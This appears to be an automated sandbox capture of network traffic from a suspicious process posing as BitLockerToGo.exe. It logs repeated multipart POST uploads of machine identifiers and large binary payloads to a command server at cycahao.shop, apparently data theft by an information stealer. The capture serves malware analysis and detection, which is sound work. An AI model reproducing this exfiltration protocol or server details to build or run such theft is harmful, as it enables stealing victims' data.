                                                                            Data Ascii: TJth9nqjIxVnI4U9sdRnhE2PykyKM4NFnvpXGc2gFtTInWA2PaVh12Pjgm7iheJHStteCQ70kpHdfcEIGKAIAQydoHT5pCUW5+MFvLNU5AZOikkNS7GQVM87UsjZ85xS3Qxx9P43t4euJga98kXh1QjbSc+a50NVDXrRC1oxH1CPnqH3+ORglidjBnwzVaeHzAmJj8ow0sYda5DPy6YOGQvcovToIHIR9mEFbucF5MWPiogPyjNSFwx60QvfMh4
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 66 54 39 74 37 65 48 71 66 44 43 2f 6a 55 56 4a 63 4c 42 47 31 34 4b 78 57 46 52 6b 34 38 2f 6b 63 78 5a 63 31 30 56 51 6f 2f 33 34 43 79 7a 4e 51 4d 79 35 78 5a 35 50 73 5a 32 42 74 36 64 52 6b 72 61 39 4d 4e 41 47 6d 67 42 44 55 75 6d 44 67 44 4e 32 32 56 30 75 4f 49 68 52 6d 6e 76 54 37 74 7a 6c 43 49 48 53 30 69 59 48 78 72 79 67 30 41 41 71 35 4e 49 48 58 52 62 6b 6b 6b 65 4d 66 72 72 74 36 65 48 73 48 44 4c 50 6a 4b 57 5a 38 4d 4b 32 41 48 4a 43 48 43 58 56 38 73 34 51 52 70 4c 73 59 34 48 47 63 78 78 39 44 78 33 74 34 4f 79 39 68 4d 71 4a 4d 48 79 67 56 30 4e 47 41 6b 61 35 30 66 46 6e 76 38 42 48 38 75 68 33 74 57 4a 6e 6d 45 77 75 50 5a 75 47 43 2b 6d 52 54 39 30 30 61 6d 4a 44 30 33 4c 54 51 38 31 41 46 4e 4f 4f 42 4b 49 48 69 41 4e 67 51 37 50
                                                                            Data Ascii: fT9t7eHqfDC/jUVJcLBG14KxWFRk48/kcxZc10VQo/34CyzNQMy5xZ5PsZ2Bt6dRkra9MNAGmgBDUumDgDN22V0uOIhRmnvT7tzlCIHS0iYHxryg0AAq5NIHXRbkkkeMfrrt6eHsHDLPjKWZ8MK2AHJCHCXV8s4QRpLsY4HGcxx9Dx3t4Oy9hMqJMHygV0NGAka50fFnv8BH8uh3tWJnmEwuPZuGC+mRT900amJD03LTQ81AFNOOBKIHiANgQ7P
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 65 67 6b 2f 5a 32 30 6d 70 6e 77 4c 4c 54 57 70 2f 50 33 77 79 68 56 73 59 59 37 77 4b 5a 33 79 41 49 41 52 7a 66 4a 58 47 35 70 32 51 58 64 36 39 4a 39 7a 4b 55 4a 6b 4d 4b 6a 6f 76 44 42 58 51 54 6c 59 31 36 56 49 32 4c 6f 34 34 53 33 51 6e 76 70 53 6f 33 72 6b 51 32 5a 74 5a 6f 34 52 69 6d 78 51 30 4b 6a 59 6a 5a 75 4a 44 58 7a 72 34 56 44 42 68 67 44 59 45 4d 6a 2f 66 68 71 37 65 67 6b 2f 5a 32 30 6d 70 6e 77 4c 4c 54 57 70 2f 50 33 77 79 68 56 73 59 59 37 77 4b 5a 33 79 41 49 41 52 7a 66 4a 58 47 35 70 32 51 58 64 36 39 4a 39 7a 4b 55 4a 6b 4d 4b 6a 6f 76 66 51 58 7a 62 47 59 46 2b 30 63 70 59 4d 64 75 56 58 51 78 78 39 75 67 78 72 38 65 30 63 4d 6d 74 59 52 50 32 45 4a 36 47 43 4d 38 4a 63 4a 62 53 58 62 4a 53 69 42 76 31 6d 68 54 4f 7a 43 70 34 73
                                                                            Data Ascii: egk/Z20mpnwLLTWp/P3wyhVsYY7wKZ3yAIARzfJXG5p2QXd69J9zKUJkMKjovDBXQTlY16VI2Lo44S3QnvpSo3rkQ2ZtZo4RimxQ0KjYjZuJDXzr4VDBhgDYEMj/fhq7egk/Z20mpnwLLTWp/P3wyhVsYY7wKZ3yAIARzfJXG5p2QXd69J9zKUJkMKjovfQXzbGYF+0cpYMduVXQxx9ugxr8e0cMmtYRP2EJ6GCM8JcJbSXbJSiBv1mhTOzCp4s
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 6a 35 59 61 36 38 4e 70 70 6a 63 6f 4b 6a 41 78 61 66 52 62 57 7a 76 67 51 32 63 67 67 47 41 45 62 44 2b 71 78 75 65 4f 68 52 37 58 77 78 57 37 6e 42 65 56 43 44 30 39 49 33 34 73 33 30 6f 59 4a 4b 42 64 5a 33 69 41 49 42 64 36 50 35 57 55 75 4e 37 42 55 4a 53 43 47 76 58 48 52 59 6f 63 4f 54 73 6a 64 52 58 37 59 45 6f 38 2f 6b 64 6c 58 38 31 38 55 69 46 38 6c 39 50 65 6f 4b 74 4d 6e 70 4d 61 75 65 68 51 6c 52 59 45 45 78 63 6a 4c 4e 55 50 66 6a 6a 34 52 32 63 67 67 47 41 45 62 44 2b 71 78 75 65 4f 68 52 79 31 68 42 54 33 68 45 6a 57 41 33 6f 37 59 47 70 34 69 77 31 4b 65 37 59 45 59 47 33 53 61 6b 49 33 61 59 53 54 33 71 43 72 54 4a 36 54 47 72 6e 31 57 70 77 4d 4c 79 34 77 4e 52 58 37 59 45 6f 38 2f 6b 64 6c 53 2f 6f 36 64 53 4a 38 68 39 72 6e 33 73 67
                                                                            Data Ascii: j5Ya68NppjcoKjAxafRbWzvgQ2cggGAEbD+qxueOhR7XwxW7nBeVCD09I34s30oYJKBdZ3iAIBd6P5WUuN7BUJSCGvXHRYocOTsjdRX7YEo8/kdlX818UiF8l9PeoKtMnpMauehQlRYEExcjLNUPfjj4R2cggGAEbD+qxueOhRy1hBT3hEjWA3o7YGp4iw1Ke7YEYG3SakI3aYST3qCrTJ6TGrn1WpwMLy4wNRX7YEo8/kdlS/o6dSJ8h9rn3sg


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.649767172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:37 UTC275OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=J0Q9FYNC6JDNKH0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12840
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:37 UTC12840OUTData Raw: 2d 2d 4a 30 51 39 46 59 4e 43 36 4a 44 4e 4b 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 46 33 42 38 43 31 34 42 46 46 33 44 41 43 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4a 30 51 39 46 59 4e 43 36 4a 44 4e 4b 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 30 51 39 46 59 4e 43 36 4a 44 4e 4b 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4a 30 51 39 46 59
                                                                            Data Ascii: --J0Q9FYNC6JDNKH0Content-Disposition: form-data; name="hwid"ADF3B8C14BFF3DAC1145237798DF8CC2--J0Q9FYNC6JDNKH0Content-Disposition: form-data; name="pid"2--J0Q9FYNC6JDNKH0Content-Disposition: form-data; name="lid"hRjzG3--VIKA--J0Q9FY
                                                                            2024-12-27 07:20:37 UTC1039INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:37 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=dj5dl32qic6mvqiv292i3dhn49; expires=Tue, 22-Apr-2025 01:07:16 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ETkgNtJqomj%2BrHLSVU7MgvbEnS%2B2jurWCCfF%2FNM%2BJ4khrmB6DDWU6S31FtVp3tFTCZqXik4h80JhpSrmEiKT6Mey5UK4T8GfKC%2BexfrAyK2Ja8QvBMPiURSxnv%2B7hWM%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878c90ff224380-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2076&min_rtt=2064&rtt_var=798&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2825&recv_bytes=13773&delivery_rate=1351226&cwnd=223&unsent_bytes=0&cid=3955d6eae75bda66&ts=827&x=0"
                                                                            2024-12-27 07:20:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-27 07:20:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.649773172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:39 UTC278OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=L6ULRPNVME8B47K2AB
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15104
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:39 UTC15104OUTData Raw: 2d 2d 4c 36 55 4c 52 50 4e 56 4d 45 38 42 34 37 4b 32 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 46 33 42 38 43 31 34 42 46 46 33 44 41 43 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4c 36 55 4c 52 50 4e 56 4d 45 38 42 34 37 4b 32 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 36 55 4c 52 50 4e 56 4d 45 38 42 34 37 4b 32 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d
                                                                            Data Ascii: --L6ULRPNVME8B47K2ABContent-Disposition: form-data; name="hwid"ADF3B8C14BFF3DAC1145237798DF8CC2--L6ULRPNVME8B47K2ABContent-Disposition: form-data; name="pid"2--L6ULRPNVME8B47K2ABContent-Disposition: form-data; name="lid"hRjzG3--VIKA
                                                                            2024-12-27 07:20:40 UTC1031INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:40 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=giojvg6kucnfednlc4jgqnn0uj; expires=Tue, 22-Apr-2025 01:07:18 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8hnd82wO5W5N6IIL4QeaFDlasVzHSMJSOqeNyrpPqMKvHg2VGoL5mJUVsFWJIMuvg%2FPPhrTMJooFWCBpegY4zjzYOsqhpO6arnJpWLpRneplrIbIQsTqfcg%2FOf6I5k%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878c9f6ebc423e-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=598&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2825&recv_bytes=16040&delivery_rate=1817050&cwnd=197&unsent_bytes=0&cid=d2eeac3d1522af69&ts=921&x=0"
                                                                            2024-12-27 07:20:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-27 07:20:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.649779172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:41 UTC276OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=TL14N08CP6A2HRYR
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 19950
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:41 UTC15331OUTData Raw: 2d 2d 54 4c 31 34 4e 30 38 43 50 36 41 32 48 52 59 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 46 33 42 38 43 31 34 42 46 46 33 44 41 43 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 54 4c 31 34 4e 30 38 43 50 36 41 32 48 52 59 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 4c 31 34 4e 30 38 43 50 36 41 32 48 52 59 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 54 4c 31
                                                                            Data Ascii: --TL14N08CP6A2HRYRContent-Disposition: form-data; name="hwid"ADF3B8C14BFF3DAC1145237798DF8CC2--TL14N08CP6A2HRYRContent-Disposition: form-data; name="pid"3--TL14N08CP6A2HRYRContent-Disposition: form-data; name="lid"hRjzG3--VIKA--TL1
                                                                            2024-12-27 07:20:41 UTC4619OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00
                                                                            Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                            2024-12-27 07:20:42 UTC1036INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:42 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=sf26fd2tposcna28hfa96ve30o; expires=Tue, 22-Apr-2025 01:07:21 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1iTELaU4qv9JKDImadleft0cKrg8PFg6je5iSflU7xD%2FJhzLzpvNR0Dye%2BzbBYvqcFu36W%2FRU2qVZQt%2FUjCI9XRbA6ndBR2vkn79ZYpxTcIZsrphZFqtNqmADihijw0%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878cadca9d7291-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1784&rtt_var=684&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2825&recv_bytes=20906&delivery_rate=1582655&cwnd=218&unsent_bytes=0&cid=f00c2f643d53bd79&ts=899&x=0"
                                                                            2024-12-27 07:20:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-27 07:20:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.649785172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:44 UTC273OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=DKXQRO7HMLDRBQ
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1203
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:44 UTC1203OUTData Raw: 2d 2d 44 4b 58 51 52 4f 37 48 4d 4c 44 52 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 46 33 42 38 43 31 34 42 46 46 33 44 41 43 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 44 4b 58 51 52 4f 37 48 4d 4c 44 52 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 4b 58 51 52 4f 37 48 4d 4c 44 52 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 44 4b 58 51 52 4f 37 48 4d
                                                                            Data Ascii: --DKXQRO7HMLDRBQContent-Disposition: form-data; name="hwid"ADF3B8C14BFF3DAC1145237798DF8CC2--DKXQRO7HMLDRBQContent-Disposition: form-data; name="pid"1--DKXQRO7HMLDRBQContent-Disposition: form-data; name="lid"hRjzG3--VIKA--DKXQRO7HM
                                                                            2024-12-27 07:20:44 UTC1030INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:44 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=ls89pqeucapruan2it6bmm06dt; expires=Tue, 22-Apr-2025 01:07:23 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbvsGkQHDLCeD9P6atdiPDUuI2odQo2%2FDjGPzC8XOXMXony9onqpqgFz8oPRpkLVW%2Bkgex03KgnqYTdFu9ZzqyPihvifyUBfLnoGtaXQ2pX50QDzpUB4cezNkVcJbYc%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878cbd4a978c90-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3047&min_rtt=1820&rtt_var=1559&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2112&delivery_rate=1604395&cwnd=201&unsent_bytes=0&cid=261a76d5dd6b0c7b&ts=755&x=0"
                                                                            2024-12-27 07:20:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-27 07:20:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.649791172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:46 UTC269OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=JEIFV1BF
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 557861
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: 2d 2d 4a 45 49 46 56 31 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 46 33 42 38 43 31 34 42 46 46 33 44 41 43 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4a 45 49 46 56 31 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 45 49 46 56 31 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4a 45 49 46 56 31 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                            Data Ascii: --JEIFV1BFContent-Disposition: form-data; name="hwid"ADF3B8C14BFF3DAC1145237798DF8CC2--JEIFV1BFContent-Disposition: form-data; name="pid"1--JEIFV1BFContent-Disposition: form-data; name="lid"hRjzG3--VIKA--JEIFV1BFContent-Dispositi
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: f4 2b 74 4c a6 95 29 24 db a6 b1 ef ac 04 c2 d0 79 58 6b cf 72 0d 1b 23 1f b7 0f 48 a6 fd aa 74 1b ae 14 fc f4 16 19 e1 b2 21 62 02 f7 d3 ec 5c 8e 67 d4 9f ac 58 f3 fd b1 a9 d2 0d 96 73 3a cd 14 bf a4 b0 4b bf 78 9b 54 5b 25 b4 17 c0 8d 89 de 84 29 03 29 c1 ab 51 cd d5 9a 88 99 c2 46 68 f3 12 98 45 6e 8d 46 11 3b 5b 1b 84 d5 4f ba 24 65 16 4d fb 65 8d fa 52 ea 1e ae 9c fc 7c 02 24 a7 87 71 a9 cf 41 df b3 22 dd 06 19 f7 c0 02 57 7d ac 1a 7d 56 12 7c 67 97 72 fe 9d 63 ad 5b e9 81 57 bc 4b 7a 65 e0 35 ff a6 62 23 2c 7f 9a 6f 53 53 1e dd a5 05 d7 06 ec 8b 86 18 68 d6 4c 52 ad ce 08 21 df 0e 6c fe 46 99 92 c0 b3 f9 0b 17 d8 cf c7 3a 27 0c 34 bf 29 d7 b3 51 8d db 11 f3 3f cb a6 bc 54 52 4a 69 95 9f 2d db c1 52 68 77 ff bb e3 8c 24 f4 95 fb 1c 67 bd b7 43 af a5
                                                                            Data Ascii: +tL)$yXkr#Ht!b\gXs:KxT[%))QFhEnF;[O$eMeR|$qA"W}}V|grc[WKze5b#,oSShLR!lF:'4)Q?TRJi-Rhw$gC
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: a4 13 96 e2 96 6d 9b 82 7f 2a 67 83 6f cd 3e d8 89 4f 7d a1 ae 8f 55 1d a1 15 1b ce 96 0c 0d 6a 7d e1 79 52 81 38 10 12 33 fd fd 6b 96 07 70 28 b0 8f 88 e8 23 9e 35 96 f0 10 68 4a a1 62 1e 6e 07 07 09 2e 8c 31 3f ce 85 7d 92 e3 d9 76 cb fd 66 a7 0d 8d 88 bd 72 20 14 62 25 95 df 58 68 1b 32 5e c4 12 15 83 63 34 5a f7 c8 5c 02 16 6f 76 7c e7 0f 4f eb 77 7f 30 6e af dd 30 9a 2e ee b6 7d 6e eb f1 55 63 ba 96 d5 52 fb c6 67 48 43 85 46 c6 c2 dd 83 2c 95 69 46 5e 95 76 35 bd 3e fa 7b 5e d0 bc f3 f4 53 c7 b4 a7 c1 23 d2 e2 6f ac 6c 7d ad b6 6b 6d b6 ae 23 28 a3 b4 c6 4f e2 8e fb de c4 90 da e3 c0 cc 80 62 84 1b 86 01 71 ed 44 a9 ee 73 7d f6 e6 6b 49 d6 2a 58 d2 c5 2d 0c dd 46 83 61 49 00 02 03 fe 05 34 c1 c9 34 0d 7b b0 d4 d0 a2 e2 aa 0d 7e 55 fe 5e 5f 82 c8 3d
                                                                            Data Ascii: m*go>O}Uj}yR83kp(#5hJbn.1?}vfr b%Xh2^c4Z\ov|Ow0n0.}nUcRgHCF,iF^v5>{^S#ol}km#(ObqDs}kI*X-FaI44{~U^_=
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: 13 40 be 38 5e f3 27 44 c9 d2 4b 45 42 19 42 cc 5b 69 20 d1 df ff d6 bd 2c c4 a1 48 64 cf 25 c5 61 f5 6f 80 b0 97 68 89 79 89 25 7e 99 94 5b e0 06 67 7e 42 4b 5e bb 84 e2 ca b9 a1 1d 22 ac 1f 41 6d 30 d2 13 03 94 fb 4e cc 4d 15 59 ea cd 25 15 ad 22 d1 39 7e f9 65 38 c9 d0 60 e1 1b de ad 54 80 b6 0f 63 dd ff 1d 15 e3 cc cb 9c da c8 3c 9c ff 7a bd bb 15 b8 78 be 95 00 e1 45 a7 c2 97 da f3 7e 65 dc bb d1 c6 b6 ed 14 b0 ed f7 64 cb f6 a4 08 19 27 1b 4d 45 3a 1b 92 64 b2 e4 8b 4a 00 ab 2c f2 a2 2f 6e d3 48 68 61 ba 7c 41 51 e2 94 8c 85 4d 88 27 cf a1 9c 96 09 90 8b cf 8f 47 f0 1b c7 92 66 b7 4f bf d9 c7 a9 45 95 b6 7b 82 67 b4 af 8d d9 b9 41 89 dd 3e 04 6e 3c 57 95 09 57 1a a1 9f d5 d7 44 65 2d 16 1f a2 95 4b b0 14 45 f6 ac 35 3c 22 5e 98 e4 be d3 9a 74 d7 20
